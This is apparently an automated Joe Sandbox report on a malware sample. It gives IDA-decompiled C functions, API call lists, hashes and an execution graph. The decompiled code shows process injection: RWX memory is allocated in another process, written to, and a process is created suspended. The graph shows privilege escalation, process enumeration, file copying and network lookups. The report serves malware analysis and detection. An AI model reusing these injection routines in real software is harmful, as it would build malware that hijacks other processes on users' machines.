                            • Part of subcall function 005D5020: GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005D5064
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D03BA
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CriticalSection$LeaveNamePath$EnterFileFindFull
                          • String ID:
                          • API String ID: 133812498-0
                          • Opcode ID: ccb510744b812cca53090352485e72868562261e3048438e6005baa9aef08d5b
                          • Instruction ID: 785a6705e91bb70197e8cb27b6c77d5035d4a3dcd8f08e16eaa15e6e4423782d
                          • Opcode Fuzzy Hash: ccb510744b812cca53090352485e72868562261e3048438e6005baa9aef08d5b
                          • Instruction Fuzzy Hash: 141199316052029BDB307B6DEC49B3A7FA5FF90705F05182FE449C6391E6615805D752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E005C6740(void* __ecx, void* __eflags, intOrPtr _a4) {
                          				char _v212;
                          				char _v312;
                          				char _v316;
                          				WCHAR* _v320;
                          				_Unknown_base(*)()* _t16;
                          				void* _t21;
                          				void* _t24;
                          				CHAR* _t28;
                          				void* _t29;
                          				WCHAR* _t31;
                          				_Unknown_base(*)()* _t32;
                          				void* _t33;
                          				void* _t34;
                          				void* _t36;
                          
                          				_t33 = __ecx;
                          				_t31 =  &_v212;
                          				_v320 = 0;
                          				_v316 = 0;
                          				E005D4520(_t31, 0x56);
                          				_t28 =  &_v312;
                          				E005D7160(_t28, 0x57);
                          				_t36 = _t34 + 0x10;
                          				_t16 = GetProcAddress(GetModuleHandleW(_t31), _t28);
                          				if(_t16 != 0) {
                          					_t32 = _t16;
                          					_t21 = E005CC380(_a4, 0, _t36, 0xffffffff);
                          					_t36 = _t36 + 0x10;
                          					if(_t21 != 0) {
                          						_t24 = E005C9CD0(lstrlenW(_v320) + _t22 + 2,  *(_t33 + 0x70), _v320, lstrlenW(_v320) + _t22 + 2);
                          						_t36 = _t36 + 0xc;
                          						if(_t24 != 0) {
                          							_t29 = _t24;
                          							_push(_t29);
                          							_push( &_v316);
                          							_push(1);
                          							_push(_t32);
                          							_push(_t33);
                          							E005D3FA0();
                          							_t36 = _t36 + 0x14;
                          							VirtualFreeEx( *(_t33 + 0x70), _t29, 0, 0x8000);
                          						}
                          					}
                          				}
                          				_t17 = _v320;
                          				if(_v320 != 0) {
                          					E005C91E0(_t17);
                          				}
                          				return _v316;
                          			}

                          APIs
                          • GetModuleHandleW.KERNEL32(?), ref: 005C6773
                          • GetProcAddress.KERNEL32(00000000,?), ref: 005C677B
                            • Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,005C8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 005CC396
                            • Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 005CC3C4
                          • lstrlenW.KERNEL32 ref: 005C67A4
                            • Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
                            • Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07
                            • Part of subcall function 005D3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3FCD
                            • Part of subcall function 005D3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4070
                            • Part of subcall function 005D3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 005D4095
                          • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 005C67E1
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: MemoryProcessVirtual$AllocByteCharMultiWideWrite$AddressFreeHandleModuleProcReadlstrlen
                          • String ID:
                          • API String ID: 2912094857-0
                          • Opcode ID: 8e60df8ae4f37bc7d8ed8c7dd5a1315e4c74b55def4c9ae02acae3dd1b2a5f6e
                          • Instruction ID: c91d7037c7a4ec58ed77151abd682bba29ca411a0c5d3328ed56e08b9de0db99
                          • Opcode Fuzzy Hash: 8e60df8ae4f37bc7d8ed8c7dd5a1315e4c74b55def4c9ae02acae3dd1b2a5f6e
                          • Instruction Fuzzy Hash: 2211B4B6A04201BFE721AB64EC4EF6B7BECFF84745F04082AF944D2291E635D914D662
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 43%
                          			E005D3100(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
                          				char _v212;
                          				char _v312;
                          				_Unknown_base(*)()* _t10;
                          				void* _t17;
                          				CHAR* _t18;
                          				_Unknown_base(*)()* _t19;
                          				WCHAR* _t21;
                          				void* _t22;
                          				void* _t23;
                          				long* _t24;
                          				long* _t26;
                          
                          				_t23 = __ecx;
                          				 *_t24 = 0;
                          				_t21 =  &_v212;
                          				E005D4520(_t21, 0x56);
                          				_t18 =  &_v312;
                          				E005D7160(_t18, 0x9b);
                          				_t26 =  &(_t24[4]);
                          				_t10 = GetProcAddress(GetModuleHandleW(_t21), _t18);
                          				if(_t10 == 0) {
                          					L7:
                          					return  *_t26;
                          				}
                          				_t22 = _a8;
                          				_t19 = _t10;
                          				if(_t22 >= 0x10000) {
                          					_push(_t22);
                          					_t17 = E005C9CD0( *0x5d9d28() + 1,  *(_t23 + 0x70), _t22,  *0x5d9d28() + 1);
                          					_t26 =  &(_t26[3]);
                          					_t22 = _t17;
                          				}
                          				if(_t22 != 0) {
                          					_push(_t22);
                          					_push(_a4);
                          					_push(_t26);
                          					_push(2);
                          					_push(_t19);
                          					_push(_t23);
                          					E005D3FA0();
                          					_t26 =  &(_t26[6]);
                          					if(_t22 >= 0x10000 && _t22 != 0) {
                          						VirtualFreeEx( *(_t23 + 0x70), _t22, 0, 0x8000);
                          					}
                          				}
                          				goto L7;
                          			}

                          APIs
                          • GetModuleHandleW.KERNEL32(?), ref: 005D3134
                          • GetProcAddress.KERNEL32(00000000,?), ref: 005D313C
                          • lstrlen.KERNEL32(?), ref: 005D3158
                            • Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
                            • Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005D31A0
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Virtual$AddressAllocFreeHandleMemoryModuleProcProcessWritelstrlen
                          • String ID:
                          • API String ID: 2409309907-0
                          • Opcode ID: 286d3f4b92a30bc589f60e39ebdb108915a40ec7b0414cb6532d953ca873b2f4
                          • Instruction ID: 02ac6473843eb1d5d4a8e9e4d11dd7c7010eae9ac69942a58a57b8c5ae374cbe
                          • Opcode Fuzzy Hash: 286d3f4b92a30bc589f60e39ebdb108915a40ec7b0414cb6532d953ca873b2f4
                          • Instruction Fuzzy Hash: 9111E572A003016BE331A768EC4DF6F7BBAFBD4741F04042BF54892251E6354945D6A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005C7440(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                          				char _v216;
                          				intOrPtr _v220;
                          				signed int _v224;
                          				WCHAR* _v228;
                          				intOrPtr _v232;
                          				intOrPtr _v244;
                          				char _v248;
                          				struct _STARTUPINFOW _v316;
                          				signed int _v320;
                          				long _t42;
                          				WCHAR* _t43;
                          				int _t46;
                          				signed int _t51;
                          				intOrPtr _t54;
                          				signed int _t56;
                          				signed int _t63;
                          				signed int _t64;
                          				struct _PROCESS_INFORMATION* _t65;
                          				intOrPtr _t69;
                          				char* _t72;
                          				signed int _t73;
                          				short _t74;
                          				signed int _t75;
                          				void* _t77;
                          				intOrPtr* _t79;
                          
                          				_t69 = __ecx;
                          				_t72 =  &(_v316.lpReserved);
                          				E005D6610(_t72, 0, 0x128);
                          				 *((intOrPtr*)(_t72 - 4)) = 0x44;
                          				GetStartupInfoW( &_v316);
                          				E005D4520( &_v216, 0x55);
                          				_t79 = _t77 + 0x14;
                          				_t42 = 4;
                          				_t51 = 0;
                          				while( *((short*)(_t79 + 0x6c + _t51 * 2)) != 0) {
                          					_t51 = _t51 + 1;
                          					_t42 = _t42 + 2;
                          					if(_t51 != 0x7fffffff) {
                          						continue;
                          					} else {
                          						_v224 = 0;
                          						_v220 = 0x80070057;
                          						L18:
                          						_t43 = _v228;
                          						L19:
                          						if(_t43 != 0) {
                          							E005C91E0(_t43);
                          						}
                          						return _v232;
                          					}
                          				}
                          				_v224 = _t51;
                          				_v220 = 0;
                          				_t43 = E005C3180(_t42, 0);
                          				_t79 = _t79 + 8;
                          				__eflags = _t43;
                          				_v228 = _t43;
                          				if(_t43 == 0) {
                          					goto L19;
                          				}
                          				_t63 = _v224;
                          				__eflags = _t63 + 2;
                          				if(__eflags <= 0) {
                          					_t54 = 0x80070057;
                          					if(__eflags != 0) {
                          						 *_t43 = 0;
                          					}
                          					L14:
                          					_v220 = _t54;
                          					goto L18;
                          				}
                          				_v320 = _t63;
                          				 *_t79 = _t69;
                          				_t64 =  ~_t63;
                          				_t73 = 0;
                          				_t56 =  ~_t43;
                          				__eflags = 1;
                          				while(1) {
                          					_t74 =  *(_t79 + 0x6c + _t73 * 2) & 0x0000ffff;
                          					__eflags = _t74;
                          					if(_t74 == 0) {
                          						break;
                          					}
                          					_t43[_t73] = _t74;
                          					_t56 = _t56 + 0xfffffffe;
                          					_t22 = _t73 + 1; // 0x1
                          					_t75 = _t22;
                          					__eflags = _t64 + _t73 - 1;
                          					if(_t64 + _t73 == 1) {
                          						L10:
                          						__eflags = _t75 - _v320 - 2;
                          						_t62 =  ==  ? 0xfffffffe - _t56 :  ~_t56;
                          						 *((short*)( ==  ? 0xfffffffe - _t56 :  ~_t56)) = 0;
                          						_t54 = 0x8007007a;
                          						if(_t75 - _v320 == 2) {
                          							goto L14;
                          						}
                          						L16:
                          						_t65 =  &_v248;
                          						 *((intOrPtr*)(_t65 + 0x1c)) = 0;
                          						_t46 = CreateProcessW(0, _t43, 0, 0, 0, 4, 0, 0,  &_v316, _t65);
                          						__eflags = _t46;
                          						if(_t46 != 0) {
                          							 *_a4 = _v248;
                          							 *_a8 = _v244;
                          							_v232 = 1;
                          							 *((intOrPtr*)( *_t79 + 0x78)) = 1;
                          						}
                          						goto L18;
                          					}
                          					__eflags = _t73 - 0x7ffffffd;
                          					_t73 = _t75;
                          					if(__eflags != 0) {
                          						continue;
                          					}
                          					goto L10;
                          				}
                          				_t43[_t73] = 0;
                          				goto L16;
                          			}

                          APIs
                          • GetStartupInfoW.KERNEL32(?), ref: 005C746C
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005C7564
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CreateInfoProcessStartup
                          • String ID: W
                          • API String ID: 525363069-655174618
                          • Opcode ID: f33617ca5d045c1202a2ac6fd20c20fb0003f2fb93ff844a0f801930e08f57bf
                          • Instruction ID: 8ccaa8f9fea25133e4233da119c53364a4a4c34948646c1d35e4da9f149d6f76
                          • Opcode Fuzzy Hash: f33617ca5d045c1202a2ac6fd20c20fb0003f2fb93ff844a0f801930e08f57bf
                          • Instruction Fuzzy Hash: 3541BEB15083059FD728DF68D849B6BBBE9FF88310F108A1DE5968B390E675D904CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:7.8%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:21.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:18

                          Graph

9793->9794 9795 6e41dd SleepEx 9793->9795 9796 6e4272 9794->9796 9797 6e91e0 RtlFreeHeap 9794->9797 9795->9793 9795->9804 9798 6e428b 9796->9798 9800 6e91e0 RtlFreeHeap 9796->9800 9797->9796 9801 6eb7a0 4 API calls 9798->9801 9799 6e41f7 Wow64DisableWow64FsRedirection 9799->9804 9800->9798 9803 6e4298 9801->9803 9802 6e420b CopyFileW 9802->9804 9805 6e421c SleepEx 9802->9805 9806 6eb7a0 4 API calls 9803->9806 9804->9775 9804->9789 9804->9790 9804->9794 9804->9799 9804->9802 9808 6e4241 Wow64RevertWow64FsRedirection 9804->9808 9805->9802 9805->9804 9807 6e42a4 9806->9807 9807->9775 9808->9804 9872 6e3180 3 API calls 9871->9872 9873 6e514b 9872->9873 9874 6f43c0 9873->9874 9875 6f43d8 9874->9875 10533 6ed8b0 9875->10533 9877 6f43e0 9878 6f43ec InitializeCriticalSectionAndSpinCount 9877->9878 9879 6f24fe 9877->9879 9880 6e5140 3 API calls 9878->9880 9900 6eab10 9879->9900 9881 6f4403 9880->9881 10537 6f03e0 9881->10537 9884 6e5140 3 API calls 9885 6f441f 9884->9885 10546 6e91b0 9885->10546 9892 6e5140 3 API calls 9893 6f4448 9892->9893 9894 6e5140 3 API calls 9893->9894 9895 6f445d 9894->9895 10591 6e1fb0 GetVersionExW 9895->10591 9901 6eab4d 9900->9901 9902 6eab20 9900->9902 9901->9674 9903 6eab2a GetFileAttributesW 9902->9903 9904 6eab39 9903->9904 9905 6eab44 CreateDirectoryW 9903->9905 9904->9901 9906 6eab3d DeleteFileW 9904->9906 9905->9901 9906->9905 9908 6e319e 9907->9908 9909 6e3193 GetProcessHeap 9907->9909 9910 6e31ab RtlReAllocateHeap 9908->9910 9911 6e31b8 RtlAllocateHeap 9908->9911 9909->9908 9912 6e31c2 9910->9912 9911->9912 9912->9666 9914 6e9eff 9913->9914 9918 6e9f6f 9913->9918 9915 6e9f64 9914->9915 9917 6e91e0 RtlFreeHeap 9914->9917 9914->9918 9916 6e3180 3 API calls 9915->9916 9916->9918 9917->9915 9918->9683 9920 6e91e8 RtlFreeHeap 9919->9920 9921 6e91f7 9919->9921 9920->9921 9921->9691 9923 6ec807 9922->9923 9924 6ec7db 9922->9924 9923->9691 9924->9923 9925 6ec866 FindFirstFileW 9924->9925 9925->9923 9929 6ec88d 9925->9929 9926 6eca9f 
FindNextFileW 9927 6ecab2 FindClose 9926->9927 9934 6ec94a 9926->9934 9927->9923 9928 6e3180 3 API calls 9928->9929 9929->9923 9929->9926 9929->9928 9929->9934 9931 6ec98a 9931->9923 9932 6e91e0 RtlFreeHeap 9932->9934 9933 6e3180 3 API calls 9933->9934 9934->9926 9934->9927 9934->9929 9934->9931 9934->9932 9934->9933 10622 6ec510 CreateFileW 9934->10622 9936 6f778b 9935->9936 9938 6e5140 3 API calls 9936->9938 9950 6f77c7 9936->9950 9937 6e5140 3 API calls 9939 6f77ea 9937->9939 9940 6f77ab 9938->9940 9941 6e31d0 3 API calls 9939->9941 9942 6e31d0 3 API calls 9940->9942 9943 6f77f6 9941->9943 9944 6f77b7 9942->9944 9947 6e3180 3 API calls 9943->9947 9945 6ecd70 30 API calls 9944->9945 9946 6f77c3 9945->9946 9946->9950 10742 6f2dc0 9946->10742 9948 6f7811 9947->9948 10697 6ecd70 9948->10697 9950->9937 9953 6f7855 9955 6f2dc0 RtlFreeHeap 9953->9955 9954 6f7833 9956 6f78dd 9954->9956 9958 6f7849 9954->9958 9965 6f78a4 9954->9965 9955->9958 9957 6f2dc0 RtlFreeHeap 9956->9957 9957->9965 9961 6f2dc0 RtlFreeHeap 9958->9961 9958->9965 9978 6f7918 9958->9978 9959 6f7978 9963 6f6750 4 API calls 9959->9963 9960 6f7930 10748 6e9b20 9960->10748 9961->9965 9967 6f7984 9963->9967 9964 6f7976 9964->9691 9965->9959 9965->9960 9966 6f7938 9969 6f2dc0 RtlFreeHeap 9966->9969 9971 6f794d 9966->9971 9966->9978 9967->9966 9970 6f7997 9967->9970 9968 6e91e0 RtlFreeHeap 9968->9964 9969->9971 9972 6e3180 3 API calls 9970->9972 9973 6f2dc0 RtlFreeHeap 9971->9973 9971->9978 9974 6f79a3 9972->9974 9973->9978 9975 6ecff0 RtlFreeHeap 9974->9975 9976 6f79c0 9975->9976 10706 6f3080 9976->10706 9978->9964 9978->9968 9980 6f675e 9979->9980 9981 6f6764 9979->9981 9982 6e91e0 RtlFreeHeap 9980->9982 9983 6eb7a0 4 API calls 9981->9983 9982->9981 9984 6f25e7 9983->9984 9984->9717 9985 6f4980 9984->9985 9986 6f49a0 9985->9986 11084 6ed4b0 GetFullPathNameW 9986->11084 9988 6f4a1f 9989 6f25f9 CreateThread 9988->9989 9991 6f4a40 9988->9991 9992 6e91e0 RtlFreeHeap 9988->9992 9989->9717 12781 6f3f50 
9989->12781 9990 6e5140 3 API calls 9997 6f49aa 9990->9997 9993 6e91e0 RtlFreeHeap 9991->9993 9992->9988 9993->9989 9996 6eb860 28 API calls 9996->9997 9997->9988 9997->9990 9997->9996 11099 6eae90 9997->11099 11102 6ecaf0 9997->11102 11113 6ecf50 9997->11113 11124 6e3b30 RtlEnterCriticalSection 9997->11124 10001 6f1993 10000->10001 10002 6f4610 31 API calls 10001->10002 10003 6f19a0 10002->10003 10003->9717 10005 6e544f WSACleanup 10004->10005 10006 6e53a0 gethostname 10004->10006 10005->9717 10006->10005 10007 6e53b8 getaddrinfo 10006->10007 10010 6e53d1 10007->10010 10008 6e5443 FreeAddrInfoW 10008->10005 10009 6e544c 10009->10005 10010->10005 10010->10008 10010->10009 10012 6e7c72 10011->10012 10024 6e7ef7 10011->10024 10013 6eb7a0 4 API calls 10012->10013 10014 6e7c7d 10013->10014 10016 6e7c93 10014->10016 10017 6e7d4e 10014->10017 10015 6e7d75 11766 6e9db0 10015->11766 10023 6e7ce5 10016->10023 10025 6e7cbf 10016->10025 10037 6e7de8 10016->10037 10017->10015 10019 6e7d63 GetFileAttributesW 10017->10019 10019->10015 10019->10037 10020 6e91e0 RtlFreeHeap 10020->10024 10022 6f4610 31 API calls 10043 6e7d92 10022->10043 10026 6f30c0 3 API calls 10023->10026 10024->9727 10030 6e6270 3 API calls 10025->10030 10027 6e7cec 10026->10027 10028 6f6f80 19 API calls 10027->10028 10029 6e7d06 10028->10029 10031 6e7dd4 10029->10031 10032 6e7d11 10029->10032 10033 6e7ce2 10030->10033 10031->10037 10038 6e91e0 RtlFreeHeap 10031->10038 11719 6f05c0 10032->11719 10033->10023 10034 6e7ece CreateThread Sleep 10034->10037 11785 6f6db0 10034->11785 10037->10020 10037->10024 10038->10037 10039 6e91e0 RtlFreeHeap 10040 6e7d3c 10039->10040 10040->10031 10041 6e7e88 10042 6e7e9a 10041->10042 10044 6e91e0 RtlFreeHeap 10041->10044 10045 6e3180 3 API calls 10042->10045 10043->10034 10043->10037 10043->10041 10047 6f7be0 9 API calls 10043->10047 10044->10042 10046 6e7eb5 10045->10046 10046->10034 10048 6e7e66 10047->10048 10048->10041 10049 6e7e7c lstrcmpiW 10048->10049 10049->10037 
10049->10041 10051 6ef070 4 API calls 10050->10051 10052 6f6be7 10051->10052 10052->9717 10054 6f4610 31 API calls 10053->10054 10055 6e3c5f 10054->10055 10056 6e5140 3 API calls 10055->10056 10070 6e3cae 10055->10070 10057 6e3c6d 10056->10057 11816 6f7d00 10057->11816 10058 6e3ce4 10058->9717 10060 6e91e0 RtlFreeHeap 10060->10058 10064 6e3cc2 10066 6e9510 RtlFreeHeap 10064->10066 10066->10070 10067 6e3c94 10067->10064 10068 6e3c9d 10067->10068 10068->10070 11829 6e9510 10068->11829 10070->10058 10070->10060 10073 6f30c0 3 API calls 10072->10073 10074 6e31d8 10073->10074 10074->9656 10076 6e224f 10075->10076 10077 6f68e0 MultiByteToWideChar 10076->10077 10078 6e226c 10077->10078 10079 6f4610 31 API calls 10078->10079 10080 6e2284 10079->10080 10080->9717 10082 6eb7a0 4 API calls 10081->10082 10084 6e9214 10082->10084 10083 6e924b 10083->9717 10084->10083 10085 6f4610 31 API calls 10084->10085 10086 6e923b 10085->10086 10087 6e91e0 RtlFreeHeap 10086->10087 10087->10083 10089 6e811a 10088->10089 10090 6e8101 10088->10090 10089->9717 10090->10089 10091 6f4610 31 API calls 10090->10091 10091->10089 10099 6f4630 10092->10099 10103 6f47fc Sleep 10099->10103 10104 6f47fa 10099->10104 10105 6f4671 Sleep 10099->10105 11858 6e1bc0 10099->11858 11878 6f4a60 10099->11878 11907 6e75c0 10099->11907 11921 6ee1b0 10099->11921 11929 6e23a0 10099->11929 11943 6e7230 10099->11943 11957 6ec5d0 10099->11957 11973 6e1720 10099->11973 11983 6e62d0 10099->11983 10103->10099 10104->9717 10105->10099 10117 6f3bb2 10106->10117 10107 6f3dbd 10108 6e1f90 2 API calls 10107->10108 10110 6f3dce 10107->10110 10108->10110 10109 6e1f90 2 API calls 10109->10117 10110->9727 10112 6f3dad 10112->10107 10113 6e91e0 RtlFreeHeap 10112->10113 10113->10107 10114 6f68e0 MultiByteToWideChar 10114->10117 10115 6f0430 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap GetTickCount RtlFreeHeap 10115->10117 10116 6e3180 GetProcessHeap RtlReAllocateHeap RtlAllocateHeap 10116->10117 10117->10107 10117->10109 
10117->10112 10117->10114 10117->10115 10117->10116 10118 6ea180 329 API calls 10117->10118 12148 6e9430 10117->12148 10118->10117 10120 6f4610 31 API calls 10119->10120 10121 6e9091 10120->10121 10122 6e5140 3 API calls 10121->10122 10132 6e9176 10121->10132 10124 6e90a3 10122->10124 10123 6e9195 10123->9727 10126 6e31d0 3 API calls 10124->10126 10125 6e91e0 RtlFreeHeap 10125->10123 10127 6e90af 10126->10127 10128 6ecd70 30 API calls 10127->10128 10129 6e90be 10128->10129 10130 6e9178 10129->10130 10133 6e90dc 10129->10133 10131 6f2dc0 RtlFreeHeap 10130->10131 10131->10132 10132->10123 10132->10125 10134 6ecff0 RtlFreeHeap 10133->10134 10135 6e90ef 10134->10135 10136 6f3080 34 API calls 10135->10136 10137 6e90fc 10136->10137 10138 6e9112 RtlEnterCriticalSection 10137->10138 10139 6e9b20 4 API calls 10137->10139 10140 6f2dc0 RtlFreeHeap 10138->10140 10139->10138 10141 6e9125 10140->10141 10142 6e912b RtlLeaveCriticalSection 10141->10142 10142->10132 10143 6e9142 10142->10143 10143->10132 12154 6f4e70 GetSystemTimeAsFileTime _aulldiv 10143->12154 10146 6eb7a0 4 API calls 10145->10146 10147 6ea17b 10146->10147 10147->9727 10149 6e7a8e 10148->10149 10150 6e7c1a 10148->10150 10151 6e3180 3 API calls 10149->10151 10152 6e7c2e WSACleanup 10150->10152 10154 6e91e0 RtlFreeHeap 10150->10154 10153 6e7a9a 10151->10153 10152->9727 10155 6e7bf9 10153->10155 12155 6ea3c0 10153->12155 10156 6e7c2b 10154->10156 10158 6e7c0d 10155->10158 10159 6e91e0 RtlFreeHeap 10155->10159 10156->10152 10158->10150 10160 6e91e0 RtlFreeHeap 10158->10160 10159->10158 10160->10150 10161 6e7ae3 FreeAddrInfoW 10168 6e7ab3 10161->10168 10162 6e91e0 RtlFreeHeap 10162->10168 10163 6f68e0 MultiByteToWideChar 10163->10168 10164 6f2e70 6 API calls 10164->10168 10165 6e7bb3 10165->10155 10167 6e7bf2 FreeAddrInfoW 10165->10167 10166 6e7b43 getaddrinfo 10166->10168 10167->10155 10168->10155 10168->10161 10168->10162 10168->10163 10168->10164 10168->10165 10168->10166 10169->9727 10171 6f033a 
RtlLeaveCriticalSection 10170->10171 10172 6f0320 10170->10172 10174 6f0351 10171->10174 10172->10171 10173 6f5020 90 API calls 10172->10173 10176 6f03b5 RtlLeaveCriticalSection 10172->10176 10173->10172 10175 6ed4b0 12 API calls 10174->10175 10183 6f035d 10175->10183 10184 6f03ad 10176->10184 10177 6f038d 10179 6f03a7 10177->10179 10181 6e91e0 RtlFreeHeap 10177->10181 10178 6f0378 PathFindFileNameW 12168 6e6570 10178->12168 10182 6e91e0 RtlFreeHeap 10179->10182 10181->10177 10182->10184 10183->10177 10183->10178 10183->10184 10184->9727 12241 6f5460 10185->12241 10187 6ea1bb 10188 6f4610 31 API calls 10187->10188 10189 6ea1cf 10187->10189 10188->10189 10192 6ea1ed 10189->10192 10193 6ea208 10189->10193 10196 6ea1f5 10189->10196 10190 6ea18c 10190->10187 12268 6e3520 10190->12268 10194 6f4610 31 API calls 10192->10194 12276 6ed1d0 10193->12276 10194->10196 10196->9727 10198 6f2f23 10197->10198 10199 6f2f43 GetCurrentProcess OpenProcessToken 10198->10199 10200 6f2fab 10198->10200 10209 6f2fe2 10198->10209 10199->10200 10201 6f2f62 10199->10201 12685 6ec440 CreateToolhelp32Snapshot 10200->12685 10202 6f2f6e LookupPrivilegeValueW 10201->10202 10202->10200 10204 6f2f83 AdjustTokenPrivileges 10202->10204 10204->10200 10205 6f2fc9 10205->10209 12694 6ed350 10205->12694 10207 6f2fda 10208 6e91e0 RtlFreeHeap 10207->10208 10208->10209 10209->9727 10213 6f73cd 10210->10213 10211 6f73f6 10211->9727 10213->10211 12720 6f7560 10213->12720 10215 6e91b0 3 API calls 10214->10215 10216 6e77f7 RtlEnterCriticalSection 10215->10216 10217 6e7833 RtlLeaveCriticalSection 10216->10217 10219 6e7808 10216->10219 10234 6e7847 10217->10234 10218 6e1f50 GetExitCodeThread 10218->10219 10219->10217 10219->10218 10222 6e1200 3 API calls 10219->10222 10220 6e1ea0 RtlFreeHeap 10221 6e79cf 10220->10221 10221->9727 10222->10219 10223 6f5c10 34 API calls 10223->10234 10224 6f2f10 22 API calls 10224->10234 10225 6f1f80 140 API calls 10225->10234 10226 6e79a3 10229 6e1ea0 RtlFreeHeap 10226->10229 10231 
6e79bd 10226->10231 10227 6e79a5 10228 6ed6b0 36 API calls 10227->10228 10228->10226 10229->10231 10230 6f2e70 6 API calls 10230->10234 10231->10220 10232 6e78c1 lstrcmpiW 10232->10234 10233 6f20f0 18 API calls 10233->10234 10234->10223 10234->10224 10234->10225 10234->10226 10234->10227 10234->10230 10234->10231 10234->10232 10234->10233 10235 6ec110 101 API calls 10234->10235 10236 6ed6b0 36 API calls 10234->10236 10235->10234 10236->10234 10238 6e5989 10237->10238 10239 6f4610 31 API calls 10238->10239 10242 6e5997 10239->10242 10240 6e59e0 10241 6e5a33 10240->10241 10244 6e91e0 RtlFreeHeap 10240->10244 10241->9717 10242->10240 10243 6e5140 3 API calls 10242->10243 10245 6e59b9 10243->10245 10244->10241 12770 6f6640 10245->12770 10252 6ed8b0 3 API calls 10251->10252 10266 6eab75 10252->10266 10253 6ec380 6 API calls 10253->10266 10254 6eac49 10255 6eac57 10254->10255 10257 6e91e0 RtlFreeHeap 10254->10257 10258 6eac68 10255->10258 10259 6e91e0 RtlFreeHeap 10255->10259 10256 6ef070 4 API calls 10256->10266 10257->10255 10261 6eac79 10258->10261 10262 6e91e0 RtlFreeHeap 10258->10262 10259->10258 10260 6eac34 Sleep 10260->10254 10260->10266 10263 6eac8a 10261->10263 10264 6e91e0 RtlFreeHeap 10261->10264 10262->10261 10265 6f19c0 3 API calls 10263->10265 10264->10263 10267 6eac96 10265->10267 10266->10253 10266->10254 10266->10256 10266->10260 10268 6e5a50 Sleep 10266->10268 10269 6eaca4 10266->10269 10267->9727 10268->10266 10270 6e7f10 3 API calls 10269->10270 10271 6eacb7 10270->10271 10271->10254 10272 6ec380 6 API calls 10271->10272 10274 6ead16 10272->10274 10273 6f6bd0 4 API calls 10273->10274 10274->10254 10274->10273 10275 6ead3e Sleep 10274->10275 10277 6ead4f 10274->10277 10275->10274 10275->10277 10276 6e5960 47 API calls 10276->10277 10277->10254 10277->10276 10278 6ead79 Sleep 10277->10278 10280 6ead8a 10277->10280 10278->10277 10278->10280 10279 6e3c40 47 API calls 10279->10280 10280->10254 10280->10279 10281 6eaddf 10280->10281 10282 6eadc0 Sleep 
